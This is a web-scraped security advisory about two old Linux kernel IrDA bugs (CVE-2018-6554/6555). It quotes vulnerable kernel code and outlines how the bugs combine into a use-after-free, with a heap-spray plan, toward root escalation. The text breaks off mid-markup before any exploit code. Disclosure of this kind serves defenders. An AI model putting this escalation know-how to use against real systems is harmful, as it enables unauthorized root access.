{"id":13461,"date":"2018-09-27T14:19:15","date_gmt":"2018-09-27T22:19:15","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/09\/27\/news-7228\/"},"modified":"2018-09-27T14:19:15","modified_gmt":"2018-09-27T22:19:15","slug":"news-7228","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/09\/27\/news-7228\/","title":{"rendered":"SSD Advisory \u2013 IRDA Linux Driver UAF"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 27 Sep 2018 11:23:40 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two vulnerabilities in the Linux Kernel. By combining these two vulnerabilities a privilege escalation can be achieved. The two vulnerabilities are quite old and have been around for at least 17 years, quite a few Long Term releases of Linux have them in their kernel. While the assessment of the Linux kernel team is that they only pose a denial of service, that is incorrect, we will provide here proof that they can run code with a bit of effort and some luck (the probability of success of gaining root privileges is above 50%).<\/p>\n<p><strong>Vendor Response<\/strong><br \/> &#8220;Memory leak in the irda_bind function in net\/irda\/af_irda.c and later in drivers\/staging\/irda\/net\/af_irda.c in the Linux kernel before 4.17 allows local users to cause a denial of service (memory consumption) by repeatedly binding an AF_IRDA socket. (CVE-2018-6554) The irda_setsockopt function in net\/irda\/af_irda.c and later in drivers\/staging\/irda\/net\/af_irda.c in the Linux kernel before 4.17 allows local users to cause a denial of service (ias_object use-after-free and system crash) or possibly have unspecified other impact via an AF_IRDA socket. (CVE-2018-6555)&#8221;<\/p>\n<p><a href=\"https:\/\/lists.ubuntu.com\/archives\/kernel-team\/2018-September\/095137.html\">https:\/\/lists.ubuntu.com\/archives\/kernel-team\/2018-September\/095137.html<\/a><\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-6554<br \/> CVE-2018-6555<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Mohamed\u00a0Ghannam,\u00a0has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3759\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> The vulnerability was introduced in 2.4.17 (21 Dec 2001) Affecting all kernel versions up to 4.17 (IrDA subsystem as removed).<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> The first bug affects IRDA socket since its birth in Linux Kernel, it relies to the general queue implementation called &#8220;hashbin&#8221;.<\/p>\n<p>Bug analysis:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f33c387844270\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> static int irda_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len)  {  \u2026  \u2026  self-&gt;ias_obj = irias_new_object(addr-&gt;sir_name, jiffies); (1)  err = -ENOMEM;  if (self-&gt;ias_obj == NULL)  goto out;    err = irda_open_tsap(self, addr-&gt;sir_lsap_sel, addr-&gt;sir_name); (2)  if (err &lt; 0) { irias_delete_object(self-&gt;ias_obj);  self-&gt;ias_obj = NULL;  goto out;  }    \u2026  irias_insert_object(self-&gt;ias_obj); (3)    \u2026  return err;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p>(1) &#8211; self-&gt;ias_obj takes the allocated object directly<br \/> (2) &#8211; in our point of view it checks if the socket is already bound<br \/> (3) &#8211; if not, insert the allocated object into global hashtable irias_objects, which keeps track of all allocated irias objects<\/p>\n<p>There is a problem in (1), if we call bind() twice, self-&gt;ias_obj loses the reference of the first allocated object, so it has no power to free it, and the object will persist in irias_objects hashtable, this allows us of course to exhaust the memory of the system, This will be useful when we combine it with another bug.<\/p>\n<p>Here is another bug :<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f348074159794\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> static int irda_setsockopt(struct socket *sock, int level, int optname,  char __user *optval, unsigned int optlen) {    case IRLMP_IAS_SET:  \u2026  \/* Find the object we target.  * If the user gives us an empty string, we use the object  * associated with this socket. This will workaround  * duplicated class name &#8211; Jean II *\/  if(ias_opt-&gt;irda_class_name[0] == &#8216;\u0000&#8217;) {   if(self-&gt;ias_obj == NULL) {    kfree(ias_opt);    err = -EINVAL;    goto out;   }   ias_obj = self-&gt;ias_obj; (4)  \u2026   if((!capable(CAP_NET_ADMIN)) &amp;&amp;      ((ias_obj == NULL) || (ias_obj != self-&gt;ias_obj))) {    kfree(ias_opt);    err = -EPERM;    goto out;   }  \u2026  \u2026   irias_insert_object(ias_obj); (5)   kfree(ias_opt);   break;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f348074159794-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f348074159794-28\">28<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-1\"><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket *<\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">level<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">optname<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-2\"><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">__user *<\/span><span class=\"crayon-v\">optval<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">optlen<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-4\"><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IRLMP_IAS_SET<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-5\">\u2026<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-6\"><span class=\"crayon-c\">\/* Find the object we target.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-7\"><span class=\"crayon-c\">* If the user gives us an empty string, we use the object<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-8\"><span class=\"crayon-c\">* associated with this socket. This will workaround<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-9\"><span class=\"crayon-c\">* duplicated class name &#8211; Jean II *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-10\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ias_opt<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">irda_class_name<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\u0000&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-11\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">kfree<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ias_opt<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">EINVAL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">goto<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-15\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-16\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-17\">\u2026<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-18\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">capable<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CAP_NET_ADMIN<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-20\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">kfree<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ias_opt<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">EPERM<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">goto<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">out<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-23\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-24\">\u2026<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-25\">\u2026<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-26\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irias_insert_object<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ias_obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f348074159794-27\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">kfree<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ias_opt<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f348074159794-28\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0041 seconds] -->  <\/p>\n<p>(4) &#8211; the comment made by the developer is self explanatory<br \/> (5) &#8211; the object is inserted in the queue<\/p>\n<p>The problem here is we can insert the same object again, because this only can be done if a new object is created, or an object already allocated by the user (via setsockopt), and only root can do this, so we can consider it as a security bypass.<\/p>\n<p>Combining these two bugs, we can re-insert an object several times, and free it later, which makes a freed object in irias_objects hash table.<\/p>\n<p>Exploiting this bug requires two things :<br \/> 1. Reliably spraying the heap to take control of the freed object<br \/> 2. A target pointer to be overwritten with userdata, this can be achieved by leaking some kernel memory or using global variables.<\/p>\n<p><em>1.Reliably spraying the heap to take control of the freed object<\/em><br \/> The freed object is allocated in kmalloc-96, we should search for a good primitive to take control over it:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bad57622f350229985963\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> struct ias_object {   irda_queue_t q; \/* Must be first! *\/   magic_t magic;     char *name;   int id;   hashbin_t *attribs;  };    struct irda_queue {   struct irda_queue *q_next;   struct irda_queue *q_prev;     char q_name[NAME_SIZE];   long q_hash; \/* Must be able to cast a (void *) *\/  };<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bad57622f350229985963-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bad57622f350229985963-16\">16<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-1\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ias_object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-2\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">irda_queue<\/span><span class=\"crayon-sy\">_<\/span>t<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* Must be first! *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">magic_t <\/span><span class=\"crayon-v\">magic<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hashbin_t *<\/span><span class=\"crayon-v\">attribs<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-8\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-10\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_queue<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-11\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_queue *<\/span><span class=\"crayon-v\">q_next<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-12\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_queue *<\/span><span class=\"crayon-v\">q_prev<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f350229985963-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f350229985963-14\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">q_name<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">NAME_SIZE<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 